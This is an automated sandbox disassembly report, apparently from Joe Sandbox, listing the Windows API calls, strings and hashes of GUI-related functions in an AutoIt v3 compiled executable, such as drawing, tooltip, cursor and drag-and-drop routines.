API String ID: 2326795674-4108050209
Opcode ID: c59c8f1eac2364b8030658f2e4e74f74c300fff047f08e5450d11894b282d7f1
Instruction ID: 00292fa9f67955be51ef7feb9626df47752bd9f08be567187b4dc6883bf9741e
Opcode Fuzzy Hash: c59c8f1eac2364b8030658f2e4e74f74c300fff047f08e5450d11894b282d7f1
Instruction Fuzzy Hash: 6702CD30104321AFD725CF24E989BBABBE5FF49310F0489ADF99D962A1CB74D845CB52

Function 00B2A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00B2A903
SetTextColor.GDI32(?,?), ref: 00B2A907
GetSysColorBrush.USER32(0000000F), ref: 00B2A91D
GetSysColor.USER32(0000000F), ref: 00B2A928
CreateSolidBrush.GDI32(?), ref: 00B2A92D
GetSysColor.USER32(00000011), ref: 00B2A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B2A953
SelectObject.GDI32(?,00000000), ref: 00B2A964
SetBkColor.GDI32(?,00000000), ref: 00B2A96D
SelectObject.GDI32(?,?), ref: 00B2A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 00B2A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B2A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00B2A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B2A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B2AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 00B2AA32
DrawFocusRect.USER32(?,?), ref: 00B2AA3D
GetSysColor.USER32(00000011), ref: 00B2AA4B
SetTextColor.GDI32(?,00000000), ref: 00B2AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B2AA67
SelectObject.GDI32(?,00B2A5FA), ref: 00B2AA7E
DeleteObject.GDI32(?), ref: 00B2AA89
SelectObject.GDI32(?,?), ref: 00B2AA8F
DeleteObject.GDI32(?), ref: 00B2AA94
SetTextColor.GDI32(?,?), ref: 00B2AA9A
SetBkColor.GDI32(?,?), ref: 00B2AAA4

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 590d6528477e8b59d7882748cfdc068553f0c59857ef06c3d6875dbf706941eb
Instruction ID: d8282f7ff43b5a16737509013ca7c2e89c69ec68387714928d7c00d8159da335
Opcode Fuzzy Hash: 590d6528477e8b59d7882748cfdc068553f0c59857ef06c3d6875dbf706941eb
Instruction Fuzzy Hash: F5515A71900219FFDB219FA4DC48EAEBBB9FF08320F114265F915AB2A1DB759941CF90

Function 00B289D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B28AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B28AD2
CharNextW.USER32(0000014E), ref: 00B28B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B28B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B28B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B28B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B28B86
SetWindowTextW.USER32(?,0000014E), ref: 00B28BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B28BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00B28C1F
_memset.LIBCMT ref: 00B28C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B28C8D
_memset.LIBCMT ref: 00B28CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B28D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00B28D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00B28E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00B28E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B28E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B28EB4
DrawMenuBar.USER32(?), ref: 00B28EC3
SetWindowTextW.USER32(?,0000014E), ref: 00B28EEB

Strings

0, xrefs: 00B28E55

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 0b3b0e1dd7feba685d1d0f5c97de1bece037a04f881027fa77ace69e068cf538
Instruction ID: 98c5024ec0f1ffa96bda860dfd89cc30d2b59d0081235342289d4cb502fbe386
Opcode Fuzzy Hash: 0b3b0e1dd7feba685d1d0f5c97de1bece037a04f881027fa77ace69e068cf538
Instruction Fuzzy Hash: 8CE17070901229AFDB219F50DC84EFE7BB9EF09710F10819AF919AB290DF749985DF60

Function 00B2488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00B249CA
GetDesktopWindow.USER32 ref: 00B249DF
GetWindowRect.USER32(00000000), ref: 00B249E6
GetWindowLongW.USER32(?,000000F0), ref: 00B24A48
DestroyWindow.USER32(?), ref: 00B24A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B24A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B24ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B24AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00B24AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B24B09
IsWindowVisible.USER32(?), ref: 00B24B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B24B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B24B58
GetWindowRect.USER32(?,?), ref: 00B24B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00B24B96
GetMonitorInfoW.USER32(00000000,?), ref: 00B24BB0
CopyRect.USER32(?,?), ref: 00B24BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00B24C32

Strings

(, xrefs: 00B24BA3
0, xrefs: 00B24975
tooltips_class32, xrefs: 00B24A96

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: a24f87e628a04293d97147f813030ddf3a2639e3beb2c88b795b386a6c85c637
Instruction ID: 200c55d325d8c71d8803e44cbdf9fe975688d65ab668ceaa9de81a47bd0f3c5a
Opcode Fuzzy Hash: a24f87e628a04293d97147f813030ddf3a2639e3beb2c88b795b386a6c85c637
Instruction Fuzzy Hash: 4DB19A70604351AFDB04DF64D988B6BBBE4FF89310F00896CF5999B2A1DB70E805CB95

Function 00B0449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00B044AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00B044D2
_wcscpy.LIBCMT ref: 00B04500
_wcscmp.LIBCMT ref: 00B0450B
_wcscat.LIBCMT ref: 00B04521
_wcsstr.LIBCMT ref: 00B0452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00B04548
_wcscat.LIBCMT ref: 00B04591
_wcscat.LIBCMT ref: 00B04598
_wcsncpy.LIBCMT ref: 00B045C3

Strings

DefaultLangCodepage, xrefs: 00B045AB
StringFileInfo\, xrefs: 00B0451B
04090000, xrefs: 00B0457E
\VarFileInfo\Translation, xrefs: 00B04540
%u.%u.%u.%u, xrefs: 00B04626

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 5444a268388cbd5a11e0dd50f9a79be8474f360d4b231a2ef4c2919c041aa590
Instruction ID: 50a7c724d162005346f3dfd2335f6dfc8f07e7bd8194e0dac0c6c8a5bf374799
Opcode Fuzzy Hash: 5444a268388cbd5a11e0dd50f9a79be8474f360d4b231a2ef4c2919c041aa590
Instruction Fuzzy Hash: E741D372940201BADB11AA749D43FBF7BFCDF56710F0401EAFA05E6192EF35AA0186A5

Function 00AA27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AA28BC
GetSystemMetrics.USER32(00000007), ref: 00AA28C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AA28EF
GetSystemMetrics.USER32(00000008), ref: 00AA28F7
GetSystemMetrics.USER32(00000004), ref: 00AA291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AA2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00AA2949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AA297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AA2990
GetClientRect.USER32(00000000,000000FF), ref: 00AA29AE
GetStockObject.GDI32(00000011), ref: 00AA29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA29D5

Part of subcall function 00AA2344: GetCursorPos.USER32(?), ref: 00AA2357
Part of subcall function 00AA2344: ScreenToClient.USER32(00B657B0,?), ref: 00AA2374
Part of subcall function 00AA2344: GetAsyncKeyState.USER32(00000001), ref: 00AA2399
Part of subcall function 00AA2344: GetAsyncKeyState.USER32(00000002), ref: 00AA23A7

SetTimer.USER32(00000000,00000000,00000028,00AA1256), ref: 00AA29FC

Strings

AutoIt v3 GUI, xrefs: 00AA2974

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: d978b5894c905e1aec8c4ef2d07f50f2a04f42a843bb186d906fc485b737eb8e
Instruction ID: 0b6dbd04325708f31edc7d924eecc45ef32048f8adf42d0cdb1abafa5cb9ce72
Opcode Fuzzy Hash: d978b5894c905e1aec8c4ef2d07f50f2a04f42a843bb186d906fc485b737eb8e
Instruction Fuzzy Hash: 00B14071A0020AEFDB24DFA8DD45BAE7BB5FB08711F104229FA15E72E0DB749861CB50

Function 00AFA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00AFA47A
__swprintf.LIBCMT ref: 00AFA51B
_wcscmp.LIBCMT ref: 00AFA52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00AFA583
_wcscmp.LIBCMT ref: 00AFA5BF
GetClassNameW.USER32(?,?,00000400), ref: 00AFA5F6
GetDlgCtrlID.USER32(?), ref: 00AFA648
GetWindowRect.USER32(?,?), ref: 00AFA67E
GetParent.USER32(?), ref: 00AFA69C
ScreenToClient.USER32(00000000), ref: 00AFA6A3
GetClassNameW.USER32(?,?,00000100), ref: 00AFA71D
_wcscmp.LIBCMT ref: 00AFA731
GetWindowTextW.USER32(?,?,00000400), ref: 00AFA757
_wcscmp.LIBCMT ref: 00AFA76B

Part of subcall function 00AC362C: _iswctype.LIBCMT ref: 00AC3634

Strings

%s%u, xrefs: 00AFA515

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: db318df17866553dc4e9d3cea715c053dc9f79e7e439637e2ccffaba1776a38f
Instruction ID: e59c61c513bff17c3ed8a13cd50a8587fb3c8b124f4364879ed33336cf5a84be
Opcode Fuzzy Hash: db318df17866553dc4e9d3cea715c053dc9f79e7e439637e2ccffaba1776a38f
Instruction Fuzzy Hash: E3A191B120420AAFD715EFA4C884FFAB7E8FF54355F008529FA99D2190DB30E955CB92

Function 00AFAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00AFAF18
_wcscmp.LIBCMT ref: 00AFAF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 00AFAF51
CharUpperBuffW.USER32(?,00000000), ref: 00AFAF6E
_wcscmp.LIBCMT ref: 00AFAF8C
_wcsstr.LIBCMT ref: 00AFAF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00AFAFD5
_wcscmp.LIBCMT ref: 00AFAFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 00AFB00C
GetClassNameW.USER32(00000018,?,00000400), ref: 00AFB055
_wcscmp.LIBCMT ref: 00AFB065
GetClassNameW.USER32(00000010,?,00000400), ref: 00AFB08D
GetWindowRect.USER32(00000004,?), ref: 00AFB0F6

Strings

ThumbnailClass, xrefs: 00AFAFE0, 00AFB060
@, xrefs: 00AFAEF9

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: f3d12dfa756d2553ed32a6b119a01907472ff77886c717083dec21119fc3f5da
Instruction ID: 2d6c5f03e75cd72a9bd2698850a756d78b10ab1ec9dc05fee8fa9efe4a44ffdb
Opcode Fuzzy Hash: f3d12dfa756d2553ed32a6b119a01907472ff77886c717083dec21119fc3f5da
Instruction Fuzzy Hash: A881E17110830A9FDB15DF90C981FBA7BE8EF54354F048569FE898A0A2DB34DD49CB61

Function 00AFABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00AFAC33

Strings

CLASSNAME=, xrefs: 00AFAC70
[CLASS:, xrefs: 00AFAC83
[REGEXPTITLE:, xrefs: 00AFAC5B
[HANDLE:, xrefs: 00AFAC3F
[ALL, xrefs: 00AFACD9
HANDLE=, xrefs: 00AFAC2C
LAST, xrefs: 00AFABF8
[ACTIVE, xrefs: 00AFAC20
ACTIVE, xrefs: 00AFAC0E
[LAST, xrefs: 00AFACE0
ALL, xrefs: 00AFACC7
REGEXP=, xrefs: 00AFAC48

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 84fd6d97dcf3615d351c31368c5f6d76a78d7398de8fdd6426aa21de6b981900
Instruction ID: abd864c7beae9c09367ca57f0720421082d5d540fc30fcb6212de0c16cb44b83
Opcode Fuzzy Hash: 84fd6d97dcf3615d351c31368c5f6d76a78d7398de8fdd6426aa21de6b981900
Instruction Fuzzy Hash: 59315271A88209A6DA14EBE0EF43FFE77A49B21751F600499F946720E1EF516F088652

Function 00B14FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00B15013
LoadCursorW.USER32(00000000,00007F00), ref: 00B1501E
LoadCursorW.USER32(00000000,00007F03), ref: 00B15029
LoadCursorW.USER32(00000000,00007F8B), ref: 00B15034
LoadCursorW.USER32(00000000,00007F01), ref: 00B1503F
LoadCursorW.USER32(00000000,00007F81), ref: 00B1504A
LoadCursorW.USER32(00000000,00007F88), ref: 00B15055
LoadCursorW.USER32(00000000,00007F80), ref: 00B15060
LoadCursorW.USER32(00000000,00007F86), ref: 00B1506B
LoadCursorW.USER32(00000000,00007F83), ref: 00B15076
LoadCursorW.USER32(00000000,00007F85), ref: 00B15081
LoadCursorW.USER32(00000000,00007F82), ref: 00B1508C
LoadCursorW.USER32(00000000,00007F84), ref: 00B15097
LoadCursorW.USER32(00000000,00007F04), ref: 00B150A2
LoadCursorW.USER32(00000000,00007F02), ref: 00B150AD
LoadCursorW.USER32(00000000,00007F89), ref: 00B150B8
GetCursorInfo.USER32(?), ref: 00B150C8

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 2dda72f2aaf3bd211225f270772cb4b14e4d0d505953e77a8b31b725a617772c
Instruction ID: b57cdd0b6e035c9bb5e0fe906f2c2fbb17edfd7769fd9fb06e4e5610c4aae896
Opcode Fuzzy Hash: 2dda72f2aaf3bd211225f270772cb4b14e4d0d505953e77a8b31b725a617772c
Instruction Fuzzy Hash: C83119B1D08319AADF209FB68C8999FBFF8FF08750F50457AA50CE7280DA7865408F91

Function 00B2A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B2A259
DestroyWindow.USER32(?,?), ref: 00B2A2D3

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B2A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B2A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B2A382
DestroyWindow.USER32(00000000), ref: 00B2A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00AA0000,00000000), ref: 00B2A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B2A3F4
GetDesktopWindow.USER32 ref: 00B2A40D
GetWindowRect.USER32(00000000), ref: 00B2A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B2A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B2A444

Part of subcall function 00AA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AA25EC

Strings

0, xrefs: 00B2A26F
tooltips_class32, xrefs: 00B2A346, 00B2A3D4

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 63529c07cc3d67f0963f4ed007643d3377208c74dc36daadd4be0b0211a6462a
Instruction ID: 4ba9c0a139ed70d5f46d90462fdb2be851e9e40bed6150ecc937a9f16bb84f11
Opcode Fuzzy Hash: 63529c07cc3d67f0963f4ed007643d3377208c74dc36daadd4be0b0211a6462a
Instruction Fuzzy Hash: 1371CE75140205AFD721DF28DC48F6A7BFAFB88700F04456CF989872A0CBB4E916CB62

Function 00B2C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

DragQueryPoint.SHELL32(?,?), ref: 00B2C627

Part of subcall function 00B2AB37: ClientToScreen.USER32(?,?), ref: 00B2AB60
Part of subcall function 00B2AB37: GetWindowRect.USER32(?,?), ref: 00B2ABD6
Part of subcall function 00B2AB37: PtInRect.USER32(?,?,00B2C014), ref: 00B2ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 00B2C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B2C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B2C6BE
_wcscat.LIBCMT ref: 00B2C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B2C705
SendMessageW.USER32(?,000000B0,?,?), ref: 00B2C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 00B2C735
SendMessageW.USER32(?,000000B1,?,?), ref: 00B2C757
DragFinish.SHELL32(?), ref: 00B2C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B2C851

Strings

@GUI_DRAGID, xrefs: 00B2C7C9
@GUI_DROPID, xrefs: 00B2C77E
@GUI_DRAGFILE, xrefs: 00B2C800

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: efefa38aa9ab138af497f6a2083a65a7846a3723ad4b5c70f1cc4eae9cbd83ba
Instruction ID: f1747d0877e725ddb892dc98d31461f4d8d80a8dca26b01e48125b5cb3e86f86
Opcode Fuzzy Hash: efefa38aa9ab138af497f6a2083a65a7846a3723ad4b5c70f1cc4eae9cbd83ba
Instruction Fuzzy Hash: 2E614671108301AFC711EF64DD85EAFBBE8EF89310F00096EF595971A1DB709A49CB52

Function 00B24392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B24424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B2446F

Strings

COLLAPSE, xrefs: 00B244B5
CHECK, xrefs: 00B2448F
UNCHECK, xrefs: 00B2464B
GETSELECTED, xrefs: 00B2457F
EXISTS, xrefs: 00B244D8
EXPAND, xrefs: 00B24521
ISCHECKED, xrefs: 00B245F2
SELECT, xrefs: 00B24620
GETTEXT, xrefs: 00B245C2
GETTOTALCOUNT, xrefs: 00B24456
GETITEMCOUNT, xrefs: 00B24551

Memory Dump Source

